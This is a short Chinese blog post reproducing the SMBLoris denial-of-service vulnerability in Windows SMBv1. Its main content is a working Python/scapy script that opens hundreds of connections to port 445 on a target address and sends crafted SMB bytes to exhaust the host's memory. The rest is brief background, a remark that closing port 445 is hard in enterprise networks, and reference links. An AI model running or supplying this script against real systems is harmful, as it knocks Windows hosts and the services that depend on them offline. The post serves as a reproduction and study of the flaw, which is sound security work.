zoukankan      html  css  js  c++  java
  • 【漏洞复现】SMBLoris windows拒绝服务漏洞

    在美国拉斯维加斯举行的2017年度DEF CON黑客大会上,安全研究人员公布了Windows系统上的一个长达20年没有发现的漏洞,该漏洞名为“SMBLoris”,黑客可以轻松的使用简短的20行代码利用该漏洞即可发起DoS攻击导致系统内存资源耗尽,该漏洞影响Windows 2000及以上系统的SMBv1协议。 

    from scapy.all import *
    import sys
    p0 = int(sys.argv[1])
    conf.L3socket
    conf.L3socket=L3RawSocket
    
    i = IP()
    i.dst = "192.168.2.3"
    t = TCP()
    t.dport = 445
    
    for p in range(p0,p0+700):
        print p
        t.sport = p
        t.flags = "S"
    
        r = sr1(i/t)
        rt = r[TCP]
        t.ack = rt.seq + 1
        t.seq = rt.ack
        t.flags = "A"
        sbss = 'x00x01xffxff'
        send(i/t/sbss)

    以上脚本必须在linux运行,不支持win和unix系列系统。

    需要注意的是,企业内网的域环境是依赖于smb协议的,文件共享和打印机服务使得漏洞修复建议上的“关闭445端口”很难落地。

    国内某公司提供了一键修复的处理方法,实质也是在注册表中关闭445端口。

    参考链接:

    https://www.youtube.com/watch?v=Y77er0gzQqA 油管演示过程

    以漏洞名命名的域名:https://smbloris.com/

  • 相关阅读:
    JavaScript跨域总结与解决办法
    css IFC 与 BFC分析
    JavaScript Note
    Knowledge Architecture
    BSP
    Olympiad
    Software Engineering
    Assembly Language
    Algorithm
    Data Structure
  • 原文地址:https://www.cnblogs.com/nayu/p/7282743.html
Copyright © 2011-2022 走看看